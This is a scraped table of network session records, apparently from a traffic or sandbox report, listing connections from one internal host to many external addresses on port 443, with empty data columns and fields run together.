                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15273192.168.2.135769617.56.227.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15274192.168.2.1337842115.83.145.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15275192.168.2.1358978151.201.49.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15276192.168.2.1341810131.249.227.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15277192.168.2.1353334155.81.219.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15278192.168.2.1359560122.242.228.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15279192.168.2.135194089.187.97.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15280192.168.2.135538070.99.60.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15281192.168.2.133582274.123.238.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15282192.168.2.133707892.49.159.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15283192.168.2.134761486.30.253.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15284192.168.2.1337460141.60.253.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15285192.168.2.1334684131.220.17.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15286192.168.2.1357840145.219.73.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15287192.168.2.1351874159.207.179.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15288192.168.2.133689248.161.144.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15289192.168.2.1352354109.217.102.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15290192.168.2.1338264147.69.194.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15291192.168.2.135063479.149.52.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15292192.168.2.133415613.214.187.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15293192.168.2.133424070.209.149.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15294192.168.2.134580060.156.108.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15295192.168.2.1338922130.35.117.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15296192.168.2.134271637.217.200.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15297192.168.2.1334800138.57.43.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15298192.168.2.1337062141.31.4.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15299192.168.2.134024652.144.74.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15300192.168.2.134043878.117.155.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15301192.168.2.1341536201.98.11.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15302192.168.2.13516864.75.181.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15303192.168.2.1336998153.94.211.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15304192.168.2.134691666.136.6.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15305192.168.2.135904671.206.114.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15306192.168.2.1357036166.3.233.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15307192.168.2.135665640.41.181.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15308192.168.2.136085490.178.94.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15309192.168.2.1337586151.147.58.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15310192.168.2.135438668.154.24.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15311192.168.2.1360216142.56.81.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15312192.168.2.134172225.233.115.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15313192.168.2.1338476184.213.16.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15314192.168.2.133996076.105.28.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15315192.168.2.133707276.22.239.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15316192.168.2.135642045.133.2.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15317192.168.2.133712867.133.155.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15318192.168.2.1337376134.146.201.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15319192.168.2.133546248.99.228.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15320192.168.2.133846442.108.145.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15321192.168.2.1340014174.102.176.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15322192.168.2.1337700202.1.62.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15323192.168.2.133492692.115.94.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15324192.168.2.1338398168.88.30.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15325192.168.2.1341606207.100.240.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15326192.168.2.1342910152.218.228.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15327192.168.2.1356372161.219.75.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15328192.168.2.1347312204.84.223.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15329192.168.2.133516017.0.115.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15330192.168.2.1355048142.99.195.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15331192.168.2.133728214.167.170.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15332192.168.2.1356484181.212.125.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15333192.168.2.1360766113.51.11.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15334192.168.2.1338654177.179.39.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15335192.168.2.1337796211.121.223.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15336192.168.2.1340860195.254.124.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15337192.168.2.135183237.147.51.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15338192.168.2.135123081.48.87.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15339192.168.2.1343076195.68.33.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15340192.168.2.1360086159.24.22.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15341192.168.2.135285841.254.130.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15342192.168.2.13399525.235.222.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15343192.168.2.1355702160.76.159.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15344192.168.2.1334520183.192.198.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15345192.168.2.134377466.163.93.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15346192.168.2.1359822152.35.15.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15347192.168.2.1352514180.105.174.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15348192.168.2.1359668174.17.136.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15349192.168.2.1358962171.37.61.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15350192.168.2.133477688.66.38.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15351192.168.2.1349662157.87.120.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15352192.168.2.135310460.71.238.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15353192.168.2.1356524183.234.240.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15354192.168.2.135178624.5.176.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15355192.168.2.1336124131.151.149.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15356192.168.2.133293248.129.73.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15357192.168.2.1339108140.171.189.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15358192.168.2.1339466175.156.26.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15359192.168.2.1357190144.9.177.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15360192.168.2.133475214.232.61.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15361192.168.2.135410679.112.218.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15362192.168.2.133382083.205.22.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15363192.168.2.1350654222.236.192.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15364192.168.2.133288484.84.189.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15365192.168.2.135385434.209.108.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15366192.168.2.135488440.60.183.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15367192.168.2.1357024169.175.166.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15368192.168.2.134400048.219.231.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15369192.168.2.1349422144.16.57.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15370192.168.2.134180494.83.184.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15371192.168.2.1354276115.17.212.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15372192.168.2.1338782143.45.128.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15373192.168.2.1339744133.55.134.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15374192.168.2.1339472128.239.215.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15375192.168.2.1357322115.94.28.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15376192.168.2.134674876.82.218.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15377192.168.2.133878472.13.80.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15378192.168.2.1355130151.184.204.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15379192.168.2.134411835.250.196.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15380192.168.2.1356656203.56.216.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15381192.168.2.1334654193.55.237.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15382192.168.2.135039291.189.160.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15383192.168.2.133358824.204.225.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15384192.168.2.1344152175.25.129.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15385192.168.2.1346478204.0.0.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15386192.168.2.135247057.246.224.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15387192.168.2.1359264151.155.70.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15388192.168.2.135249864.4.243.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15389192.168.2.1344678163.77.136.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15390192.168.2.1333246197.83.164.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15391192.168.2.1336502146.75.59.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15392192.168.2.134181867.124.97.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15393192.168.2.1359982120.103.205.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15394192.168.2.1348276180.122.51.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15395192.168.2.135881619.43.74.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15396192.168.2.133739892.86.24.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15397192.168.2.133354273.34.146.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15398192.168.2.1338850139.51.177.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15399192.168.2.133986441.212.221.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15400192.168.2.133916849.25.98.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15401192.168.2.1357602222.231.126.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15402192.168.2.135597261.11.174.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15403192.168.2.1348542129.232.180.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15404192.168.2.1337024197.90.51.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15405192.168.2.1351776217.47.73.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15406192.168.2.1350850182.4.178.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15407192.168.2.133561044.143.119.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15408192.168.2.134894874.81.69.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15409192.168.2.1348144119.40.3.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15410192.168.2.134097675.96.192.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15411192.168.2.133488459.250.6.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15412192.168.2.1347702136.190.155.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15413192.168.2.133630881.0.1.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15414192.168.2.1341060184.205.38.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15415192.168.2.1356096194.177.7.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15416192.168.2.1338316116.59.46.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15417192.168.2.1354668107.201.22.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15418192.168.2.134943042.86.155.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15419192.168.2.135747641.174.186.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15420192.168.2.1359860192.22.103.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15421192.168.2.135250853.198.236.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15422192.168.2.1360376130.51.56.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15423192.168.2.1341172118.191.242.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15424192.168.2.1358838219.195.166.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15425192.168.2.1345582181.236.169.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15426192.168.2.1345998102.107.216.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15427192.168.2.134578067.78.191.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15428192.168.2.1350560115.183.243.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15429192.168.2.1348522200.188.111.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15430192.168.2.136046654.163.71.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15431192.168.2.1339868194.234.183.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15432192.168.2.133913076.144.74.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15433192.168.2.133531292.171.254.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15434192.168.2.1342876189.71.57.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15435192.168.2.1335890144.247.104.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15436192.168.2.1352424216.7.20.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15437192.168.2.1360224153.239.207.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15438192.168.2.1334336158.201.244.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15439192.168.2.1357108138.2.88.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15440192.168.2.135114491.65.157.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15441192.168.2.135579687.149.71.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15442192.168.2.1357806145.201.229.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15443192.168.2.135789424.77.37.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15444192.168.2.134494663.131.30.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15445192.168.2.134449294.53.214.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15446192.168.2.1332836166.206.70.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15447192.168.2.133387869.62.177.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15448192.168.2.1339756110.16.198.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15449192.168.2.1340380207.61.120.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15450192.168.2.1351050218.23.157.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15451192.168.2.135996483.63.129.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15452192.168.2.134635284.40.158.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15453192.168.2.133713245.70.196.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15454192.168.2.1359434218.242.164.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15455192.168.2.1351852197.218.182.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15456192.168.2.133976219.208.150.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15457192.168.2.1353074145.16.216.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15458192.168.2.134939890.80.62.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15459192.168.2.134003492.240.10.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15460192.168.2.1350976144.227.93.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15461192.168.2.1335928148.133.90.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15462192.168.2.1339612181.148.119.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15463192.168.2.13471781.12.245.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15464192.168.2.136021640.78.192.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15465192.168.2.1357364112.208.226.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15466192.168.2.135380074.254.139.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15467192.168.2.1347116103.114.210.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15468192.168.2.134607624.24.223.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15469192.168.2.135363076.99.62.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15470192.168.2.1351694130.170.217.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15471192.168.2.1341280117.204.75.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15472192.168.2.1338958182.204.42.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15473192.168.2.1338698163.225.250.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15474192.168.2.1335682105.38.205.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15475192.168.2.136076417.27.40.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15476192.168.2.135883862.56.65.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15477192.168.2.1360056147.73.149.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15478192.168.2.1340552180.113.125.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15479192.168.2.1333110171.5.74.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15480192.168.2.1344852174.242.14.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15481192.168.2.1333394216.44.184.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15482192.168.2.1356704129.178.232.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15483192.168.2.1359910160.95.108.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15484192.168.2.1360070195.204.69.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15485192.168.2.1340580223.155.81.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15486192.168.2.1343790193.48.72.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15487192.168.2.1349698139.6.155.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15488192.168.2.1346296164.99.216.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15489192.168.2.135230899.46.31.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15490192.168.2.133478867.178.48.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15491192.168.2.1343988181.255.232.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15492192.168.2.1360382141.236.52.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15493192.168.2.1337706208.165.15.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
